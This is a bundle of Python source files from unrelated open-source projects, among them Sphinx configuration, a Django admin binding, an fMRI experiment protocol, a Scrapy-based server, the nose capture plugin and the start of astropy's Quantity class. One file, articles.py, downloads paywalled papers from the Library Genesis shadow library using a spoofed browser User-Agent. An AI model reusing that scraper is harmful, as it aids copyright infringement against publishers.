# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'djangocms-markitupdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'djangocms-markitup.tex', u'djangocms-markitup Documentation',
u'Iacopo Spalletti', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangocms-markitup', u'djangocms-markitup Documentation',
[u'Iacopo Spalletti'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'djangocms-markitup', u'djangocms-markitup Documentation',
u'Iacopo Spalletti', 'djangocms-markitup', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
nephila/djangocms-markitup
|
docs/conf.py
|
Python
|
bsd-3-clause
| 8,236
|
import os
import re
import requests
from urllib.parse import urljoin
from rdflib import Graph, RDF, URIRef, Literal, plugin
from rdflib.store import Store
from rdflib.parser import StringInputSource
from os.path import join as pjoin
from .protect import cstring
test_dois = ('10.1016/0097-3165(79)90023-2',
'10.1002/rsa.3240010202',
'10.1016/0095-8956(71)90029-3',
'10.2307/2370675')
generic_headers = {
'Accept-Encoding': 'gzip, deflate, sdch',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive',
}
class IPythonPDF(object):
def _repr_html_(self):
tpl = '<iframe src={0} width={1[0]} height={1[1]}></iframe>'
return tpl.format(self.filename, (1050, 1000))
def _repr_latex_(self):
tpl = r'\includegraphics[width=1.0\textwidth]{{{0}}}'
return tpl.format(self.filename)
class BibItem(IPythonPDF):
def __init__(self, *args, **kwargs):
identifier = URIRef('doi')
self.store = plugin.get('SQLAlchemy', Store)(identifier=identifier)
self.graph = Graph(self.store, identifier=identifier)
self.graph.open(cstring, create=True)
class DOIMetadata(BibItem):
def __init__(self, doi, *args, **kwargs):
super().__init__(*args, **kwargs)
self.doi = Literal(doi)
url = URIRef(pjoin('http://dx.doi.org', doi))
r = requests.get(url, headers={'Accept': 'application/rdf+xml'})
r.raise_for_status()
self.graph.parse(StringInputSource(r.content), formal='xml')
class DOI(DOIMetadata):
"""find and download a pdf for the doi given
>>> DOI('10.1016/0166-218X(92)00170-Q')
"""
headers = generic_headers
headers['Host'] = 'gen.lib.rus.ec'
headers['Referer'] = 'http://gen.lib.rus.ec/scimag/'
url = 'http://gen.lib.rus.ec/scimag/?s={}&journalid=&v=&i=&p=&redirect=1'
def __init__(self, doi, *args, **kwargs):
super().__init__(doi, *args, **kwargs)
self.url = URIRef(self.url.format(self.doi))
r = requests.get(self.url, headers=self.headers)
r.raise_for_status()
self.links = re.compile(r'a href="([^"]+pdf)"').findall(r.text)
link, *links = self.links
r = requests.get(link, stream=True)
self.filename = Literal('.'.join((doi.replace('/','_'), 'pdf')))
with open(self.filename, 'wb') as fd:
for chunk in r.iter_content(1024*10):
fd.write(chunk)
self.path = URIRef(urljoin('file:', pjoin(os.getcwd(), self.filename)))
self.graph.add((self.path, URIRef('http://purl.org/dc/terms/identifier'), self.doi))
self.graph.commit()
|
douglas-larocca/articles
|
articles/articles.py
|
Python
|
bsd-3-clause
| 2,932
|
# Copyright (c) 2009-2010, Steve 'Ashcrow' Milner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Bindings for models.
"""
__docformat__ = 'restructuredtext'
from django.contrib import admin
from error_capture_middleware.models import Error
class ErrorAdmin(admin.ModelAdmin):
"""
Admin binding for Error to include Notes.
"""
list_display = ('id', 'traceback', 'resolved', 'timestamp')
# Register admin
admin.site.register(Error, ErrorAdmin)
|
enderlabs/django-error-capture-middleware
|
src/error_capture_middleware/admin.py
|
Python
|
bsd-3-clause
| 1,957
|
"""On 'the N word'.
---
layout: post
source: Louis CK
source_url: https://youtu.be/dF1NUposXVQ?t=30s
title: the 'n-word'
date: 2014-06-10 12:31:19
categories: writing
---
Take responsibility with the shitty words you wanna say.
"""
from proselint.tools import existence_check, memoize
@memoize
def check(text):
"""Check the text."""
err = "cursing.nword"
msg = "Take responsibility for the shitty words you want to say."
list = [
"the n-word",
]
return existence_check(text, list, err, msg)
|
amperser/proselint
|
proselint/checks/cursing/nword.py
|
Python
|
bsd-3-clause
| 549
|
"""
Experiments of the paper 'The Approximation of the Dissimilarity
Projection' accepted at PRNI2012.
Quantification of the dissimilarity approximation of tractography data
across different prototype selection policies and number of prototypes.
Copyright (c) 2012, Emanuele Olivetti
Distributed under the New BSD license (3-clauses)
"""
import numpy as np
import nibabel as nib
from dipy.tracking.distances import bundles_distances_mam
from dipy.io.dpy import Dpy
from dissimilarity_common import *
if __name__ == '__main__':
np.random.seed(0)
figure = 'small_dataset' # 'big_dataset' #
if figure=='small_dataset':
filename = 'data/subj_05/101_32/DTI/tracks_dti_10K.dpy'
prototype_policies = ['random', 'fft', 'sff']
color_policies = ['ko--', 'kx:', 'k^-']
elif figure=='big_dataset':
filename = 'data/subj_05/101_32/DTI/tracks_dti_3M.dpy'
prototype_policies = ['random', 'sff']
color_policies = ['ko--', 'k^-']
num_prototypes = [3, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50]
iterations = 50
print "Loading tracks."
dpr = Dpy(filename, 'r')
tracks = dpr.read_tracks()
dpr.close()
tracks = np.array(tracks, dtype=np.object)
# tracks = tracks[:100]
print "tracks:", tracks.size
rho = compute_correlation(tracks, bundles_distances_mam, prototype_policies, num_prototypes, iterations)
plot_results(rho, num_prototypes, prototype_policies, color_policies)
|
emanuele/prni2012_dissimilarity
|
dissimilarity_streamlines.py
|
Python
|
bsd-3-clause
| 1,471
|
# -*- coding: utf-8 -*-
import os
import csv
import numpy as np
import dirfiles
from confparser import load_config
import expyriment
from expyriment import design, control, stimuli, io, misc
def launch_protocol(protocol_ini, exp, gender, vs):
# %%
# ======================== LOAD CONFIG.INI FILE ===========================
# Select .ini file for instructions
setting = load_config(protocol_ini)
# %%
# ========================== LOAD INPUT FILES =============================
# Define the pathway of the inputs directory
inputs_path = os.path.abspath(setting["inputs_dir"] + gender +
'/version_' + vs)
print inputs_path
# List input csv files
inputs_filenames = dirfiles.listdir_csvnohidden(inputs_path)
inputs_filenames.sort()
# %%
# ======== WAITS FOR USER TO ENTER BLOCK (AKA RUN) NUMBER TO START ========
# Define number of runs
nb_block = len(inputs_filenames)
# Wait 5 seconds in order to launch input text screen
exp.keyboard.wait(duration=5000)
# Create text input box
ti = io.TextInput(message='Block number:', message_text_size=24,
message_colour=map(int, setting["bcolor"]),
user_text_colour=map(int, setting["ucolor"]),
ascii_filter=misc.constants.K_ALL_DIGITS,
frame_colour=(70, 70, 70))
# Load user's input
while True:
sb = ti.get('0')
# If string is empty
if not sb:
warning_message1 = stimuli.TextLine(setting["wm1"].decode('utf-8'),
text_size=24,
text_colour=(204, 0, 0))
warning_message1.present()
exp.keyboard.wait(misc.constants.K_RETURN, duration=5000)
continue
# If block number introduced is higher than the number of blocks
# preset in config file
elif int(sb) >= nb_block:
warning_message2 = stimuli.TextLine(setting["wm2"].decode('utf-8'),
text_size=24,
text_colour=(204, 0, 0))
warning_message2.present()
exp.keyboard.wait(misc.constants.K_RETURN, duration=5000)
continue
else:
start_block = int(sb)
break
# %%
# ============================== DESIGN ===================================
# Stimuli sequence of the protocol
session_list = [[i for i in csv.reader(open(inputs_filename))]
for inputs_filename in inputs_filenames]
# Define the blocks using expyriment module
block_list = [expyriment.design.Block(name="block%d" % bs)
for bs in np.arange(nb_block)]
# For all blocks in the block list...
for bl in np.arange(nb_block):
# ...add stimuli to the trials and add trials to the blocks
for l,line in enumerate(session_list[bl]):
# Create a trial
trial = design.Trial()
# Retrieve variables from input files at every trial and
# label them according to what is defined by var_names
for tsf in np.arange(len(setting["var_names"]) - 1):
trial.set_factor(setting["var_names"][tsf],
line[tsf].decode('utf-8'))
trial.set_factor(setting["var_names"][-1],
line[-2].decode('utf-8'))
# Create stimuli...
if line[1] == '0':
# ... (1) for Rest trial,
# (i.e. between encoding and recognition), ...
if line[0] == '+':
fixcross_isi = stimuli.FixCross(size=(30, 30),
line_width=3,
colour=(255, 255, 255))
# Add fixation cross to the trial
trial.add_stimulus(fixcross_isi)
# (2) for Instructions trial, ...
else:
instruction = stimuli.TextLine(line[4].decode('utf-8'),
position=(0, 250),
text_size=56,
text_colour=(255, 153, 51))
question = stimuli.TextLine(line[0].decode('utf-8'),
position=(0, 0),
text_size=58,)
question_reminder = stimuli.TextLine(
line[0].decode('utf-8'), position=(0, 250),
text_size=56, text_colour=(255, 153, 51))
# Add instructions to the trial
trial.add_stimulus(instruction)
trial.add_stimulus(question)
# ... and (3) for active trial.
else:
# Add adjectives to the trial
adjective = stimuli.TextLine(line[0].decode('utf-8'),
text_size=58,
position=(0, 0))
yes_answer = stimuli.TextLine(setting["yes_key_indication"],
position=(-350, -250),
text_size=60)
no_answer = stimuli.TextLine(setting["no_key_indication"],
position=(300, -250),
text_size=60)
trial.add_stimulus(question_reminder)
trial.add_stimulus(adjective)
trial.add_stimulus(yes_answer)
trial.add_stimulus(no_answer)
# Add trial to run
block_list[bl].add_trial(trial)
# Add block to the experiment
for ad in np.arange(nb_block):
exp.add_block(block_list[ad])
# Print exp. variable names in the log file
exp.data_variable_names = setting["llog_var_names"]
# # %%
# # ================ DEFINE AND PRELOAD SOME STIMULI ======================
# TTL cross
fixcross_ttl = stimuli.FixCross(size=(40, 40), line_width=3,
colour=(255, 255, 0))
fixcross_ttl.preload()
# # Message at the end of each session
blockend_message = stimuli.TextLine(setting["text_end_session"],
text_size=44,
text_colour=(255, 153, 51))
blockend_message.preload()
# # Final message before quitting the experiment
text_end = stimuli.TextBox(str(''.join((setting["text_end_exp_one"],
'\n\n',
setting["text_end_exp_two"]))).decode('utf-8'),
(1000, 1000), position=(0, -400),
text_size=44, text_colour=(255, 153, 51))
text_end.preload()
# # %%
# # ================================ RUN ==================================
# # =======================================================================
# # Starts running the experiment:
# # (1) Present a screen asking for the subject no. (exp.subject) and
# # wait for the RETURN key
# # (2) Create a data file (exp.data)
# # (3) Present the "Ready" screen
# # =======================================================================
control.start(exp, skip_ready_screen=True)
# # =======================================================================
# # Run the protocol
# # =======================================================================
stop = False
found_key = 0
key_totalexp = []
# While "h" key is not pressed, ...
while not stop:
# Loop over all runs
for b, block in enumerate(exp.blocks[start_block:]):
block_no = b + start_block
t_jit = 0
# Display fixation cross that sets the beginning of the experiment
fixcross_ttl.present()
# Wait for TTL
exp.keyboard.wait_char(setting["TTL"])
exp.screen.clear()
exp.screen.update()
# Creates the clock
t0 = misc.Clock()
# Wait INITIALWAIT seconds before the beginning of the trial
fixcross_isi.present()
exp.clock.wait(setting["INITIALWAIT"])
# Loop over all trials within a block
for t, trial in enumerate(block.trials):
# Getter for the time in milliseconds since clock init.
# Time for the beginning of the trial
t_start = t0.time
# Present stimulus
for s, stimulus in enumerate(trial.stimuli):
if len(trial.stimuli) > 1:
if s == 0:
stimulus.present(update=False)
elif s == len(trial.stimuli) - 1:
stimulus.present(clear=False)
else:
stimulus.present(clear=False, update=False)
else:
stimulus.present()
# Jittered duration during rest,
# i.e. between encoding and recognition
if len(trial.stimuli) == 1:
jit_rest = design.randomize.rand_int(10000, 14000)
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=jit_rest)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
diff_mean_rest = 1000 - jit_rest
t_jit = t_jit + diff_mean_rest
# Calculate total duration of the rest period
duration_rest = t0.time - t_start
# Log file registry for rest
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][2]),
t_start, duration_rest])
else:
# Duration of active trials
if len(trial.stimuli) == 4:
key, rt = exp.keyboard.wait_char([setting["YES"],
setting["NO"]],
duration=5000)
t_end = t0.time
t_diff = t_end - t_start
if t_diff < 5000:
exp.clock.wait(5000-t_diff)
# Calculate total duration of the active condition
duration_active = t0.time - t_start
# Log file registry for the active condition
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][1]),
trial.get_factor(setting["var_names"][2]),
trial.get_factor(setting["var_names"][3]),
trial.get_factor(setting["var_names"][4]),
t_start, duration_active, key, rt])
# Duration of instruction trial
else:
found_key, _ = exp.keyboard.wait(
keys=[misc.constants.K_h], duration=5000)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
# Calculate total duration of the instruction
duration_inst = t0.time - t_start
# Log file registry for the instruction trials
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][2]),
t_start, duration_inst])
# Jittered ISI fixation cross
fixcross_isi.present()
jit_isi = design.randomize.rand_int(300, 700)
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=jit_isi)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
diff_mean_isi = 500 - jit_isi
t_jit = t_jit + diff_mean_isi
if stop:
break
# Display fixation cross in the end of the session
fixcross_isi.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=15000 + t_jit)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
# In the end of each session:
if block_no < (nb_block - 1):
fixcross_isi.present()
# Display message: "End of Session"
blockend_message.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_RETURN,
misc.constants.K_h])
if found_key == misc.constants.K_h:
stop = True
break
# In the end of the experiment:
elif block_no == (nb_block - 1):
fixcross_isi.present()
# Display message: "End of the Experiment"
text_end.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_RETURN,
misc.constants.K_h],
duration=5000)
# Leave while loop
stop = True
|
hbp-brain-charting/public_protocols
|
self/protocol/protocol.py
|
Python
|
bsd-3-clause
| 14,601
|
from settings import * # flake8: noqa
def create_db():
from django.db import connection
connection.creation.create_test_db(autoclobber=True)
create_db()
from tests.models import * # flake8: noqa
from tests.factories import * # flake8: noqa
for i in range(100): ExampleModelFactory.create()
|
kevinastone/django-cursor-pagination
|
tests/playground.py
|
Python
|
bsd-3-clause
| 305
|
"""
The module is used by the Twisted plugin system
(twisted.plugins.slyd_plugin) to register twistd command to manage
slyd server. The command can be used with 'twistd slyd'.
"""
from os import listdir
from os.path import join, dirname, isfile
from twisted.python import usage
from twisted.web.resource import Resource
from twisted.application.internet import TCPServer
from twisted.web.static import File
from .resource import SlydJsonObjectResource
from .server import Site, debugLogFormatter
DEFAULT_PORT = 9001
DEFAULT_DOCROOT = join(dirname(dirname(__file__)), 'dist')
class Options(usage.Options):
optParameters = [
['port', 'p', DEFAULT_PORT, 'Port number to listen on.', int],
['docroot', 'd', DEFAULT_DOCROOT, 'Default doc root for static media.']
]
class Capabilities(SlydJsonObjectResource):
isLeaf = True
def __init__(self, spec_manager):
self.spec_manager = spec_manager
def render_GET(self, request):
return {
'capabilities': self.spec_manager.capabilities,
'custom': self.spec_manager.customizations,
'username': request.auth_info.get('username'),
}
def create_root(config, settings_module):
from scrapy import log
from scrapy.settings import Settings
from .specmanager import SpecManager
from .authmanager import AuthManager
from .projectspec import create_project_resource
from slyd.bot import create_bot_resource
from slyd.projects import create_projects_manager_resource
root = Resource()
static = Resource()
for file_name in listdir(config['docroot']):
file_path = join(config['docroot'], file_name)
if isfile(file_path):
static.putChild(file_name, File(file_path))
static.putChild('main.html', File(join(config['docroot'], 'index.html')))
root.putChild('static', static)
root.putChild('assets', File(join(config['docroot'], 'assets')))
root.putChild('fonts', File(join(config['docroot'], 'assets', 'fonts')))
root.putChild('', File(join(config['docroot'], 'index.html')))
settings = Settings()
settings.setmodule(settings_module)
spec_manager = SpecManager(settings)
# add server capabilities at /server_capabilities
capabilities = Capabilities(spec_manager)
root.putChild('server_capabilities', capabilities)
# add projects manager at /projects
projects = create_projects_manager_resource(spec_manager)
root.putChild('projects', projects)
# add crawler at /projects/PROJECT_ID/bot
projects.putChild('bot', create_bot_resource(spec_manager))
# add project spec at /projects/PROJECT_ID/spec
spec = create_project_resource(spec_manager)
projects.putChild('spec', spec)
auth_manager = AuthManager(settings)
return auth_manager.protectResource(root)
def makeService(config):
import slyd.settings
root = create_root(config, slyd.settings)
site = Site(root, logFormatter=debugLogFormatter)
return TCPServer(config['port'], site)
|
nju520/portia
|
slyd/slyd/tap.py
|
Python
|
bsd-3-clause
| 3,029
|
"""
A module interface to shapelet functions
"""
__version__ = '0.2' #this needs to be kept up to date with setup.py
import decomp, fileio, img, measure, shapelet
|
griffinfoster/shapelets
|
shapelets/__init__.py
|
Python
|
bsd-3-clause
| 166
|
"""
This plugin captures stdout during test execution, appending any
output captured to the error or failure output, should the test fail
or raise an error. It is enabled by default but may be disable with
the options -s or --nocapture.
"""
import logging
import os
import sys
from nose.plugins.base import Plugin
from nose.util import ln
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
log = logging.getLogger(__name__)
class Capture(Plugin):
"""
Output capture plugin. Enabled by default. Disable with -s or
--nocapture. This plugin captures stdout during test execution,
appending any output captured to the error or failure output,
should the test fail or raise an error.
"""
enabled = True
env_opt = 'NOSE_NOCAPTURE'
name = 'capture'
score = 500
def __init__(self):
self.stdout = []
self._buf = None
def options(self, parser, env=os.environ):
parser.add_option(
"-s", "--nocapture", action="store_false",
default=not env.get(self.env_opt), dest="capture",
help="Don't capture stdout (any stdout output "
"will be printed immediately) [NOSE_NOCAPTURE]")
def configure(self, options, conf):
self.conf = conf
if not options.capture:
self.enabled = False
def afterTest(self, test):
self.end()
self._buf = None
def begin(self):
self.start() # get an early handle on sys.stdout
def beforeTest(self, test):
self.start()
def formatError(self, test, err):
test.capturedOutput = output = self.buffer
self._buf = None
if not output:
# Don't return None as that will prevent other
# formatters from formatting and remove earlier formatters
# formats, instead return the err we got
return err
ec, ev, tb = err
return (ec, self.addCaptureToErr(ev, output), tb)
def formatFailure(self, test, err):
return self.formatError(test, err)
def addCaptureToErr(self, ev, output):
return '\n'.join([str(ev) , ln('>> begin captured stdout <<'),
output, ln('>> end captured stdout <<')])
def start(self):
self.stdout.append(sys.stdout)
self._buf = StringIO()
sys.stdout = self._buf
def end(self):
if self.stdout:
sys.stdout = self.stdout.pop()
def finalize(self, result):
while self.stdout:
self.end()
def _get_buffer(self):
if self._buf is not None:
return self._buf.getvalue()
buffer = property(_get_buffer, None, None,
"""Captured stdout output.""")
|
santisiri/popego
|
envs/ALPHA-POPEGO/lib/python2.5/site-packages/nose-0.10.1-py2.5.egg/nose/plugins/capture.py
|
Python
|
bsd-3-clause
| 2,780
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module defines the `Quantity` object, which represents a number with some
associated units. `Quantity` objects support operations like ordinary numbers,
but will deal with unit conversions internally.
"""
# Standard library
import re
import numbers
from fractions import Fraction
import warnings
import numpy as np
# AstroPy
from .core import (Unit, dimensionless_unscaled, get_current_unit_registry,
UnitBase, UnitsError, UnitConversionError, UnitTypeError)
from .utils import is_effectively_unity
from .format.latex import Latex
from astropy.utils.compat import NUMPY_LT_1_14, NUMPY_LT_1_16, NUMPY_LT_1_17
from astropy.utils.compat.misc import override__dir__
from astropy.utils.exceptions import AstropyDeprecationWarning, AstropyWarning
from astropy.utils.misc import isiterable
from astropy.utils.data_info import ParentDtypeInfo
from astropy import config as _config
from .quantity_helper import (converters_and_unit, can_have_arbitrary_unit,
check_output)
from .quantity_helper.function_helpers import (
SUBCLASS_SAFE_FUNCTIONS, FUNCTION_HELPERS, DISPATCHED_FUNCTIONS,
UNSUPPORTED_FUNCTIONS)
__all__ = ["Quantity", "SpecificTypeQuantity",
"QuantityInfoBase", "QuantityInfo", "allclose", "isclose"]
# We don't want to run doctests in the docstrings we inherit from Numpy
__doctest_skip__ = ['Quantity.*']
_UNIT_NOT_INITIALISED = "(Unit not initialised)"
_UFUNCS_FILTER_WARNINGS = {np.arcsin, np.arccos, np.arccosh, np.arctanh}
class Conf(_config.ConfigNamespace):
"""
Configuration parameters for Quantity
"""
latex_array_threshold = _config.ConfigItem(100,
'The maximum size an array Quantity can be before its LaTeX '
'representation for IPython gets "summarized" (meaning only the first '
'and last few elements are shown with "..." between). Setting this to a '
'negative number means that the value will instead be whatever numpy '
'gets from get_printoptions.')
conf = Conf()
class QuantityIterator:
"""
Flat iterator object to iterate over Quantities
A `QuantityIterator` iterator is returned by ``q.flat`` for any Quantity
``q``. It allows iterating over the array as if it were a 1-D array,
either in a for-loop or by calling its `next` method.
Iteration is done in C-contiguous style, with the last index varying the
fastest. The iterator can also be indexed using basic slicing or
advanced indexing.
See Also
--------
Quantity.flatten : Returns a flattened copy of an array.
Notes
-----
`QuantityIterator` is inspired by `~numpy.ma.core.MaskedIterator`. It
is not exported by the `~astropy.units` module. Instead of
instantiating a `QuantityIterator` directly, use `Quantity.flat`.
"""
def __init__(self, q):
self._quantity = q
self._dataiter = q.view(np.ndarray).flat
def __iter__(self):
return self
def __getitem__(self, indx):
out = self._dataiter.__getitem__(indx)
# For single elements, ndarray.flat.__getitem__ returns scalars; these
# need a new view as a Quantity.
if isinstance(out, type(self._quantity)):
return out
else:
return self._quantity._new_view(out)
def __setitem__(self, index, value):
self._dataiter[index] = self._quantity._to_own_unit(value)
def __next__(self):
"""
Return the next value, or raise StopIteration.
"""
out = next(self._dataiter)
# ndarray.flat._dataiter returns scalars, so need a view as a Quantity.
return self._quantity._new_view(out)
next = __next__
class QuantityInfoBase(ParentDtypeInfo):
# This is on a base class rather than QuantityInfo directly, so that
# it can be used for EarthLocationInfo yet make clear that that class
# should not be considered a typical Quantity subclass by Table.
attrs_from_parent = {'dtype', 'unit'} # dtype and unit taken from parent
_supports_indexing = True
@staticmethod
def default_format(val):
return f'{val.value}'
@staticmethod
def possible_string_format_functions(format_):
"""Iterate through possible string-derived format functions.
A string can either be a format specifier for the format built-in,
a new-style format string, or an old-style format string.
This method is overridden in order to suppress printing the unit
in each row since it is already at the top in the column header.
"""
yield lambda format_, val: format(val.value, format_)
yield lambda format_, val: format_.format(val.value)
yield lambda format_, val: format_ % val.value
class QuantityInfo(QuantityInfoBase):
"""
Container for meta information like name, description, format. This is
required when the object is used as a mixin column within a table, but can
be used as a general way to store meta information.
"""
_represent_as_dict_attrs = ('value', 'unit')
_construct_from_dict_args = ['value']
_represent_as_dict_primary_data = 'value'
def new_like(self, cols, length, metadata_conflicts='warn', name=None):
"""
Return a new Quantity instance which is consistent with the
input ``cols`` and has ``length`` rows.
This is intended for creating an empty column object whose elements can
be set in-place for table operations like join or vstack.
Parameters
----------
cols : list
List of input columns
length : int
Length of the output column object
metadata_conflicts : str ('warn'|'error'|'silent')
How to handle metadata conflicts
name : str
Output column name
Returns
-------
col : Quantity (or subclass)
Empty instance of this class consistent with ``cols``
"""
# Get merged info attributes like shape, dtype, format, description, etc.
attrs = self.merge_cols_attributes(cols, metadata_conflicts, name,
('meta', 'format', 'description'))
# Make an empty quantity using the unit of the last one.
shape = (length,) + attrs.pop('shape')
dtype = attrs.pop('dtype')
# Use zeros so we do not get problems for Quantity subclasses such
# as Longitude and Latitude, which cannot take arbitrary values.
data = np.zeros(shape=shape, dtype=dtype)
# Get arguments needed to reconstruct class
map = {key: (data if key == 'value' else getattr(cols[-1], key))
for key in self._represent_as_dict_attrs}
map['copy'] = False
out = self._construct_from_dict(map)
# Set remaining info attributes
for attr, value in attrs.items():
setattr(out.info, attr, value)
return out
class Quantity(np.ndarray):
"""A `~astropy.units.Quantity` represents a number with some associated unit.
See also: http://docs.astropy.org/en/stable/units/quantity.html
Parameters
----------
value : number, `~numpy.ndarray`, `Quantity` object (sequence), str
The numerical value of this quantity in the units given by unit. If a
`Quantity` or sequence of them (or any other valid object with a
``unit`` attribute), creates a new `Quantity` object, converting to
`unit` units as needed. If a string, it is converted to a number or
`Quantity`, depending on whether a unit is present.
unit : `~astropy.units.UnitBase` instance, str
An object that represents the unit associated with the input value.
Must be an `~astropy.units.UnitBase` object or a string parseable by
the :mod:`~astropy.units` package.
dtype : ~numpy.dtype, optional
The dtype of the resulting Numpy array or scalar that will
hold the value. If not provided, it is determined from the input,
except that any integer and (non-Quantity) object inputs are converted
to float by default.
copy : bool, optional
If `True` (default), then the value is copied. Otherwise, a copy will
only be made if ``__array__`` returns a copy, if value is a nested
sequence, or if a copy is needed to satisfy an explicitly given
``dtype``. (The `False` option is intended mostly for internal use,
to speed up initialization where a copy is known to have been made.
Use with care.)
order : {'C', 'F', 'A'}, optional
Specify the order of the array. As in `~numpy.array`. This parameter
is ignored if the input is a `Quantity` and ``copy=False``.
subok : bool, optional
If `False` (default), the returned array will be forced to be a
`Quantity`. Otherwise, `Quantity` subclasses will be passed through,
or a subclass appropriate for the unit will be used (such as
`~astropy.units.Dex` for ``u.dex(u.AA)``).
ndmin : int, optional
Specifies the minimum number of dimensions that the resulting array
should have. Ones will be pre-pended to the shape as needed to meet
this requirement. This parameter is ignored if the input is a
`Quantity` and ``copy=False``.
Raises
------
TypeError
If the value provided is not a Python numeric type.
TypeError
If the unit provided is not either a :class:`~astropy.units.Unit`
object or a parseable string unit.
Notes
-----
Quantities can also be created by multiplying a number or array with a
:class:`~astropy.units.Unit`. See http://docs.astropy.org/en/latest/units/
"""
# Need to set a class-level default for _equivalencies, or
# Constants can not initialize properly
_equivalencies = []
# Default unit for initialization; can be overridden by subclasses,
# possibly to `None` to indicate there is no default unit.
_default_unit = dimensionless_unscaled
# Ensures views have an undefined unit.
_unit = None
__array_priority__ = 10000
def __new__(cls, value, unit=None, dtype=None, copy=True, order=None,
subok=False, ndmin=0):
if unit is not None:
# convert unit first, to avoid multiple string->unit conversions
unit = Unit(unit)
# if we allow subclasses, allow a class from the unit.
if subok:
qcls = getattr(unit, '_quantity_class', cls)
if issubclass(qcls, cls):
cls = qcls
# optimize speed for Quantity with no dtype given, copy=False
if isinstance(value, Quantity):
if unit is not None and unit is not value.unit:
value = value.to(unit)
# the above already makes a copy (with float dtype)
copy = False
if type(value) is not cls and not (subok and
isinstance(value, cls)):
value = value.view(cls)
if dtype is None:
if not copy:
return value
if value.dtype.kind in 'iu':
dtype = float
return np.array(value, dtype=dtype, copy=copy, order=order,
subok=True, ndmin=ndmin)
# Maybe str, or list/tuple of Quantity? If so, this may set value_unit.
# To ensure array remains fast, we short-circuit it.
value_unit = None
if not isinstance(value, np.ndarray):
if isinstance(value, str):
# The first part of the regex string matches any integer/float;
# the second parts adds possible trailing .+-, which will break
# the float function below and ensure things like 1.2.3deg
# will not work.
pattern = (r'\s*[+-]?'
r'((\d+\.?\d*)|(\.\d+)|([nN][aA][nN])|'
